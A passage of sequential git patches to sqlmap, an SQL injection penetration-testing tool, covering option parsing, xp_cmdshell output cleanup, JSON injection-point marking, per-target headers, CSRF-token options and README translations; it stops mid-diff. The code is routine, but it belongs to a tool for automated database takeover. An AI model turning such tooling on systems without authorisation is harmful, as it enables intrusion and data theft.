+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
+
+Μεταφράσεις
+----
+
+* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
+* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)

From fb65caabd239cca7611c3afcb43c04ffaf5f7f58 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 13 Oct 2014 09:19:25 +0200
Subject: [PATCH 065/492] Unhidding switch --ignore-401

---
 lib/parse/cmdline.py | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index b2d736afe..0084e731c 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -136,6 +136,9 @@ def cmdLineParser():
         request.add_option("--auth-private", dest="authPrivate",
                            help="HTTP authentication PEM private key file")
 
+        request.add_option("--ignore-401", dest="ignore401", action="store_true",
+                          help="Ignore HTTP Error 401 (Unauthorized)")
+
         request.add_option("--proxy", dest="proxy",
                            help="Use a proxy to connect to the target URL")
 
@@ -728,9 +731,6 @@ def cmdLineParser():
         parser.add_option("--force-dns", dest="forceDns", action="store_true",
                           help=SUPPRESS_HELP)
 
-        parser.add_option("--ignore-401", dest="ignore401", action="store_true",
-                          help=SUPPRESS_HELP)
-
         parser.add_option("--smoke-test", dest="smokeTest", action="store_true",
                           help=SUPPRESS_HELP)
 

From 006d9d185925322f02e91ff52b9a3ba5052a7591 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 13 Oct 2014 12:00:34 +0200
Subject: [PATCH 066/492] Bug fix for a problem reported by a user via ML
 (--os-shell)

---
 lib/takeover/xp_cmdshell.py | 15 ++++++++++-----
 1 file changed, 10 insertions(+), 5 deletions(-)

diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index e8ffe746f..b1dbf3388 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -7,6 +7,7 @@ See the file 'doc/COPYING' for copying permission
 
 from lib.core.agent import agent
 from lib.core.common import Backend
+from lib.core.common import flattenValue
 from lib.core.common import getLimitRange
 from lib.core.common import getSQLSnippet
 from lib.core.common import hashDBWrite
@@ -226,12 +227,16 @@ class Xp_cmdshell:
             inject.goStacked("DELETE FROM %s" % self.cmdTblName)
 
             if output and isListLike(output) and len(output) > 1:
-                if not (output[0] or "").strip():
-                    output = output[1:]
-                elif not (output[-1] or "").strip():
-                    output = output[:-1]
+                _ = ""
+                lines = [_ for _ in flattenValue(output) if _ is not None]
 
-                output = "\n".join(line for line in filter(None, output))
+                for i in xrange(len(lines)):
+                    line = lines[i] or ""
+                    if line is None or i in (0, len(lines) - 1) and not line.strip():
+                        continue
+                    _ += "%s\n" % line
+
+                output = _.rstrip('\n')
 
         return output
 

From db30b37f8abd69e9221f8b4b65932f17ffa027e1 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 14 Oct 2014 09:00:26 +0200
Subject: [PATCH 067/492] Removing translations from already translated pages
 (to ease the inclusion of other languages)

---
 doc/translations/README-cn-CN.md | 6 ------
 doc/translations/README-gr-GR.md | 6 ------
 2 files changed, 12 deletions(-)

diff --git a/doc/translations/README-cn-CN.md b/doc/translations/README-cn-CN.md
index 9080e7ad5..c3b8b2941 100644
--- a/doc/translations/README-cn-CN.md
+++ b/doc/translations/README-cn-CN.md
@@ -50,9 +50,3 @@ sqlmap 可以运行在 [Python](http://www.python.org/download/)  **2.6.x**  和
 * Twitter: [@sqlmap](https://twitter.com/sqlmap)
 * 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
 * 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
-
-翻译
-----
-
-* [葡萄牙文](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
-* [印度尼西亚文](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
diff --git a/doc/translations/README-gr-GR.md b/doc/translations/README-gr-GR.md
index 4d34e42db..8b09ba653 100644
--- a/doc/translations/README-gr-GR.md
+++ b/doc/translations/README-gr-GR.md
@@ -51,9 +51,3 @@ sqlmap
 * Twitter: [@sqlmap](https://twitter.com/sqlmap)
 * Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
 * Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
-
-Μεταφράσεις
-----
-
-* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
-* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)

From 19b0bc5a9219324ffd49dc3def933ae01a4e82a9 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 14 Oct 2014 09:31:03 +0200
Subject: [PATCH 068/492] Adding a Croatian translation of README.md

---
 doc/translations/README-hr-HR.md | 53 ++++++++++++++++++++++++++++++++
 1 file changed, 53 insertions(+)
 create mode 100644 doc/translations/README-hr-HR.md

diff --git a/doc/translations/README-hr-HR.md b/doc/translations/README-hr-HR.md
new file mode 100644
index 000000000..69e2d531d
--- /dev/null
+++ b/doc/translations/README-hr-HR.md
@@ -0,0 +1,53 @@
+sqlmap
+==
+
+
+sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza.
+
+Slike zaslona
+----
+
+![Slika zaslona](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+Možete posjetiti [kolekciju slika zaslona](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gdje se demonstriraju neke od značajki na wiki stranicama.
+
+Instalacija
+----
+
+Možete preuzeti zadnji tarball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/tarball/master) ili zadnji zipball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija:
+
+    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap radi bez posebnih zahtjeva korištenjem [Python](http://www.python.org/download/) verzije **2.6.x** i/ili **2.7.x** na bilo kojoj platformi.
+
+Korištenje
+----
+
+Kako biste dobili listu osnovnih opcija i prekidača koristite:
+
+    python sqlmap.py -h
+
+Kako biste dobili listu svih opcija i prekidača koristite:
+
+    python sqlmap.py -hh
+
+Možete pronaći primjer izvršavanja [ovdje](https://gist.github.com/stamparm/5335217).
+Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te opis svih opcija i prekidača, zajedno s primjerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki).
+
+Poveznice
+----
+
+* Početna stranica: http://sqlmap.org
+* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS feed promjena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues
+* Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki
+* Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Pretplata na mailing listu: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
+* RSS feed mailing liste: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
+* Arhiva mailing liste: http://news.gmane.org/gmane.comp.security.sqlmap
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

From 50e7cae915c6eec338dee656042b09cb4b71d07b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 14 Oct 2014 09:32:01 +0200
Subject: [PATCH 069/492] Minor update

---
 README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/README.md b/README.md
index 407ef70ee..87d361bd0 100644
--- a/README.md
+++ b/README.md
@@ -56,6 +56,7 @@ Translations
 ----
 
 * [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-cn-CN.md)
+* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
 * [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
 * [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
 * [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)

From 1b18035eb3173b8009b279383a74ce76d8bd69b1 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 14 Oct 2014 13:00:51 +0200
Subject: [PATCH 070/492] Correcting language code

---
 README.md                                             | 2 +-
 doc/translations/{README-cn-CN.md => README-zh-CN.md} | 0
 2 files changed, 1 insertion(+), 1 deletion(-)
 rename doc/translations/{README-cn-CN.md => README-zh-CN.md} (100%)

diff --git a/README.md b/README.md
index 87d361bd0..8115c5dd5 100644
--- a/README.md
+++ b/README.md
@@ -55,7 +55,7 @@ Links
 Translations
 ----
 
-* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-cn-CN.md)
+* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
 * [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
 * [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
 * [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
diff --git a/doc/translations/README-cn-CN.md b/doc/translations/README-zh-CN.md
similarity index 100%
rename from doc/translations/README-cn-CN.md
rename to doc/translations/README-zh-CN.md

From 3ebc5faa345a90a54a5c7b24db259ff5f9c88c41 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 21 Oct 2014 09:23:34 +0200
Subject: [PATCH 071/492] Falling back to partial UNION if large dump connects
 out

---
 lib/request/inject.py | 12 ++++++++++--
 1 file changed, 10 insertions(+), 2 deletions(-)

diff --git a/lib/request/inject.py b/lib/request/inject.py
index 5fa111829..4da700d94 100644
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -38,6 +38,7 @@ from lib.core.enums import CHARSET_TYPE
 from lib.core.enums import DBMS
 from lib.core.enums import EXPECTED
 from lib.core.enums import PAYLOAD
+from lib.core.exception import SqlmapConnectionException
 from lib.core.exception import SqlmapNotVulnerableException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.settings import MAX_TECHNIQUES_PER_VALUE
@@ -371,11 +372,18 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
                 if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
                     kb.technique = PAYLOAD.TECHNIQUE.UNION
                     kb.forcePartialUnion = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector[8]
-                    value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
+                    fallback = not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion
+
+                    try:
+                        value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
+                    except SqlmapConnectionException:
+                        if not fallback:
+                            raise
+
                     count += 1
                     found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
 
-                    if not found and not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion:
+                    if not found and fallback:
                         warnMsg = "something went wrong with full UNION "
                         warnMsg += "technique (could be because of "
                         warnMsg += "limitation on retrieved number of entries)"

From a2f578dbf4d2cace46dac66d8ef6b01322d6acb8 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 22 Oct 2014 10:28:10 +0200
Subject: [PATCH 072/492] Patch to also include JSON array elements into
 automatic recognition

---
 lib/core/target.py | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/lib/core/target.py b/lib/core/target.py
index 1daf63060..1c91a4d59 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -134,6 +134,12 @@ def _setRequestParams():
                     conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
                     conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
                     conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
+                    match = re.search(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data)
+                    if match and not (conf.testParameter and match.group("name") not in conf.testParameter):
+                        _ = match.group(2)
+                        _ = re.sub(r'("[^"]+)"', '\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, _)
+                        _ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, _)
+                        conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))
                     kb.postHint = POST_HINT.JSON
 
             elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):

From e239fefe67c18ce0199a35a2e4f1743cdae3565c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 22 Oct 2014 10:38:49 +0200
Subject: [PATCH 073/492] Minor patch for JSON requests

---
 lib/core/agent.py | 6 ++----
 1 file changed, 2 insertions(+), 4 deletions(-)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index b8abc5567..2d6146c3b 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -101,10 +101,8 @@ class Agent(object):
             origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
             if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
                 origValue = origValue.split('>')[-1]
-            elif kb.postHint == POST_HINT.JSON:
-                origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)(?P<result>[^"]+\Z)', origValue)
-            elif kb.postHint == POST_HINT.JSON_LIKE:
-                origValue = extractRegexResult(r'(?s)\'\s*:\s*(?P<result>\d+\Z)', origValue) or extractRegexResult(r"(?s)(?P<result>[^']+\Z)", origValue)
+            elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE):
+                origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)\s*(?P<result>[^"\[,]+\Z)', origValue)
             else:
                 _ = extractRegexResult(r"(?s)(?P<result>[^\s<>{}();'\"&]+\Z)", origValue) or ""
                 origValue = _.split('=', 1)[1] if '=' in _ else ""

From 268095495e3225ab0266c78b4ed541e7c405c77b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 22 Oct 2014 13:32:49 +0200
Subject: [PATCH 074/492] Minor patch

---
 lib/request/basic.py | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/lib/request/basic.py b/lib/request/basic.py
index 95a6b23ec..e30ab2df8 100755
--- a/lib/request/basic.py
+++ b/lib/request/basic.py
@@ -38,6 +38,7 @@ from lib.parse.headers import headersParser
 from lib.parse.html import htmlParser
 from lib.utils.htmlentities import htmlEntities
 from thirdparty.chardet import detect
+from thirdparty.odict.odict import OrderedDict
 
 def forgeHeaders(items=None):
     """
@@ -51,7 +52,7 @@ def forgeHeaders(items=None):
         if items[_] is None:
             del items[_]
 
-    headers = dict(conf.httpHeaders)
+    headers = OrderedDict(conf.httpHeaders)
     headers.update(items or {})
 
     class _str(str):
@@ -62,7 +63,7 @@ def forgeHeaders(items=None):
             return _str(self)
 
     _ = headers
-    headers = {}
+    headers = OrderedDict()
     for key, value in _.items():
         success = False
         if key.upper() not in (_.upper() for _ in getPublicTypeMembers(HTTP_HEADER, True)):

From 2f18df345e916306b8e5ee344a60233137ea2fee Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 22 Oct 2014 13:41:36 +0200
Subject: [PATCH 075/492] Minor patch

---
 lib/request/connect.py | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index d0512b8b5..99e88cacc 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -92,8 +92,9 @@ from lib.request.basic import processResponse
 from lib.request.direct import direct
 from lib.request.comparison import comparison
 from lib.request.methodrequest import MethodRequest
-from thirdparty.socks.socks import ProxyError
 from thirdparty.multipart import multipartpost
+from thirdparty.odict.odict import OrderedDict
+from thirdparty.socks.socks import ProxyError
 
 
 class Connect(object):
@@ -638,7 +639,7 @@ class Connect(object):
         threadData = getCurrentThreadData()
 
         if conf.httpHeaders:
-            headers = dict(conf.httpHeaders)
+            headers = OrderedDict(conf.httpHeaders)
             contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys())
 
             if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode:

From 34aed7cde0ee3d49aa07cae9d6c269b9f3540b1d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 22 Oct 2014 13:49:29 +0200
Subject: [PATCH 076/492] Bug fix (now it's possible to use multiple parsed
 requests without mixing associated headers)

---
 lib/controller/controller.py | 7 +++++--
 lib/core/common.py           | 2 +-
 lib/core/option.py           | 7 ++++---
 lib/utils/crawler.py         | 2 +-
 4 files changed, 11 insertions(+), 7 deletions(-)

diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index e57330d96..68d5eb8e8 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -251,7 +251,7 @@ def start():
         return True
 
     if conf.url and not any((conf.forms, conf.crawlDepth)):
-        kb.targets.add((conf.url, conf.method, conf.data, conf.cookie))
+        kb.targets.add((conf.url, conf.method, conf.data, conf.cookie, None))
 
     if conf.configFile and not kb.targets:
         errMsg = "you did not edit the configuration file properly, set "
@@ -264,13 +264,16 @@ def start():
         logger.info(infoMsg)
 
     hostCount = 0
+    initialHeaders = list(conf.httpHeaders)
 
-    for targetUrl, targetMethod, targetData, targetCookie in kb.targets:
+    for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets:
         try:
             conf.url = targetUrl
             conf.method = targetMethod
             conf.data = targetData
             conf.cookie = targetCookie
+            conf.httpHeaders = list(initialHeaders)
+            conf.httpHeaders.extend(targetHeaders or [])
 
             initTargetEnv()
             parseTargetUrl()
diff --git a/lib/core/common.py b/lib/core/common.py
index 9b8f21045..2131f695e 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -3391,7 +3391,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
                     logger.debug(debugMsg)
                     continue
 
-                target = (url, method, data, conf.cookie)
+                target = (url, method, data, conf.cookie, None)
                 retVal.add(target)
     else:
         errMsg = "there were no forms found at the given target URL"
diff --git a/lib/core/option.py b/lib/core/option.py
index 921fd035e..b5da3df44 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -271,6 +271,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
             params = False
             newline = None
             lines = request.split('\n')
+            headers = []
 
             for index in xrange(len(lines)):
                 line = lines[index]
@@ -320,14 +321,14 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
                             port = filterStringValue(splitValue[1], "[0-9]")
 
                     # Avoid to add a static content length header to
-                    # conf.httpHeaders and consider the following lines as
+                    # headers and consider the following lines as
                     # POSTed data
                     if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper():
                         params = True
 
                     # Avoid proxy and connection type related headers
                     elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION):
-                        conf.httpHeaders.append((getUnicode(key), getUnicode(value)))
+                        headers.append((getUnicode(key), getUnicode(value)))
 
                     if CUSTOM_INJECTION_MARK_CHAR in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""):
                         params = True
@@ -355,7 +356,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
 
                 if not(conf.scope and not re.search(conf.scope, url, re.I)):
                     if not kb.targets or url not in addedTargetUrls:
-                        kb.targets.add((url, method, data, cookie))
+                        kb.targets.add((url, method, data, cookie, tuple(headers)))
                         addedTargetUrls.add(url)
 
     fp = openFile(reqFile, "rb")
diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py
index caea59a85..cb502eca1 100644
--- a/lib/utils/crawler.py
+++ b/lib/utils/crawler.py
@@ -143,4 +143,4 @@ def crawl(target):
             logger.warn(warnMsg)
         else:
             for url in threadData.shared.value:
-                kb.targets.add((url, None, None, None))
+                kb.targets.add((url, None, None, None, None))

From 60f2764c3dd1f5b79d46e64727890e0746d8eb78 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 22 Oct 2014 13:53:18 +0200
Subject: [PATCH 077/492] Minor style update

---
 lib/core/settings.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/settings.py b/lib/core/settings.py
index 887009543..9f63e00aa 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -535,7 +535,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
 CHECK_ZERO_COLUMNS_THRESHOLD = 10
 
 # Boldify all logger messages containing these "patterns"
-BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that")
+BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is")
 
 # Generic www root directory names
 GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")

From 73a3db67eb7836c3d4e867ff4a3eab43b8369ed9 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 22 Oct 2014 14:54:49 +0200
Subject: [PATCH 078/492] Fix for an Issue #862

---
 lib/core/option.py | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index b5da3df44..65e45a7a4 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -219,7 +219,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
 
             if not(conf.scope and not re.search(conf.scope, url, re.I)):
                 if not kb.targets or url not in addedTargetUrls:
-                    kb.targets.add((url, method, None, cookie))
+                    kb.targets.add((url, method, None, cookie, None))
                     addedTargetUrls.add(url)
 
     def _parseBurpLog(content):
@@ -561,14 +561,14 @@ def _setGoogleDorking():
         for link in links:
             link = urldecode(link)
             if re.search(r"(.*?)\?(.+)", link):
-                kb.targets.add((link, conf.method, conf.data, conf.cookie))
+                kb.targets.add((link, conf.method, conf.data, conf.cookie, None))
             elif re.search(URI_INJECTABLE_REGEX, link, re.I):
                 if kb.data.onlyGETs is None and conf.data is None and not conf.googleDork:
                     message = "do you want to scan only results containing GET parameters? [Y/n] "
                     test = readInput(message, default="Y")
                     kb.data.onlyGETs = test.lower() != 'n'
                 if not kb.data.onlyGETs or conf.googleDork:
-                    kb.targets.add((link, conf.method, conf.data, conf.cookie))
+                    kb.targets.add((link, conf.method, conf.data, conf.cookie, None))
 
         return links
 
@@ -618,7 +618,7 @@ def _setBulkMultipleTargets():
     for line in getFileItems(conf.bulkFile):
         if re.match(r"[^ ]+\?(.+)", line, re.I) or CUSTOM_INJECTION_MARK_CHAR in line:
             found = True
-            kb.targets.add((line.strip(), None, None, None))
+            kb.targets.add((line.strip(), None, None, None, None))
 
     if not found and not conf.forms and not conf.crawlDepth:
         warnMsg = "no usable links found (with GET parameters)"
@@ -635,7 +635,7 @@ def _setSitemapTargets():
     for item in parseSitemap(conf.sitemapUrl):
         if re.match(r"[^ ]+\?(.+)", item, re.I):
             found = True
-            kb.targets.add((item.strip(), None, None, None))
+            kb.targets.add((item.strip(), None, None, None, None))
 
     if not found and not conf.forms and not conf.crawlDepth:
         warnMsg = "no usable links found (with GET parameters)"

From 8dcad468053450fe5d0cd9c15db0ee5d7704fc80 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 22 Oct 2014 23:16:46 +0200
Subject: [PATCH 079/492] Update basic.py

---
 lib/request/basic.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/request/basic.py b/lib/request/basic.py
index e30ab2df8..75bfbada2 100755
--- a/lib/request/basic.py
+++ b/lib/request/basic.py
@@ -53,7 +53,7 @@ def forgeHeaders(items=None):
             del items[_]
 
     headers = OrderedDict(conf.httpHeaders)
-    headers.update(items or {})
+    headers.update(items.items())
 
     class _str(str):
         def capitalize(self):

From fc1b05bec907e96444d2227693fed0ab80c25b67 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 23 Oct 2014 11:23:53 +0200
Subject: [PATCH 080/492] Implementation for an Issue #2

---
 lib/controller/controller.py |  6 ++++++
 lib/core/exception.py        |  3 +++
 lib/core/target.py           |  6 ++++++
 lib/parse/cmdline.py         |  6 ++++++
 lib/request/basic.py         |  2 +-
 lib/request/connect.py       | 29 +++++++++++++++++++++++++++++
 6 files changed, 51 insertions(+), 1 deletion(-)

diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index 68d5eb8e8..fe9c448d8 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -457,6 +457,12 @@ def start():
                             infoMsg = "skipping %s parameter '%s'" % (place, parameter)
                             logger.info(infoMsg)
 
+                        elif parameter == conf.csrfToken:
+                            testSqlInj = False
+
+                            infoMsg = "skipping CSRF protection token parameter '%s'" % parameter
+                            logger.info(infoMsg)
+
                         # Ignore session-like parameters for --level < 4
                         elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)):
                             testSqlInj = False
diff --git a/lib/core/exception.py b/lib/core/exception.py
index 8fe6a7756..562d75ecc 100644
--- a/lib/core/exception.py
+++ b/lib/core/exception.py
@@ -53,6 +53,9 @@ class SqlmapSyntaxException(SqlmapBaseException):
 class SqlmapThreadException(SqlmapBaseException):
     pass
 
+class SqlmapTokenException(SqlmapBaseException):
+    pass
+
 class SqlmapUndefinedMethod(SqlmapBaseException):
     pass
 
diff --git a/lib/core/target.py b/lib/core/target.py
index 1c91a4d59..343cb32a2 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -344,6 +344,12 @@ def _setRequestParams():
         errMsg += "within the given request data"
         raise SqlmapGenericException(errMsg)
 
+    if conf.csrfToken:
+        if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))):
+            errMsg = "CSRF protection token parameter '%s' not " % conf.csrfToken
+            errMsg += "found in provided GET and/or POST values"
+            raise SqlmapGenericException(errMsg)
+
 def _setHashDB():
     """
     Check and set the HashDB SQLite file for query resume functionality.
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 0084e731c..85aa91d63 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -190,6 +190,12 @@ def cmdLineParser():
                            action="store_true",
                            help="Skip URL encoding of payload data")
 
+        request.add_option("--csrf-token", dest="csrfToken",
+                           help="Parameter used as a CSRF protection token")
+
+        request.add_option("--csrf-url", dest="csrfUrl",
+                           help="URL address to visit to extract CSRF protection token")
+
         request.add_option("--force-ssl", dest="forceSSL",
                            action="store_true",
                            help="Force usage of SSL/HTTPS")
diff --git a/lib/request/basic.py b/lib/request/basic.py
index 75bfbada2..ac887e08c 100755
--- a/lib/request/basic.py
+++ b/lib/request/basic.py
@@ -106,7 +106,7 @@ def forgeHeaders(items=None):
                 elif not kb.testMode:
                     headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, cookie.name, getUnicode(cookie.value))
 
-        if kb.testMode:
+        if kb.testMode and not conf.csrfToken:
             resetCookieJar(conf.cj)
 
     return headers
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 99e88cacc..157e0cce2 100644
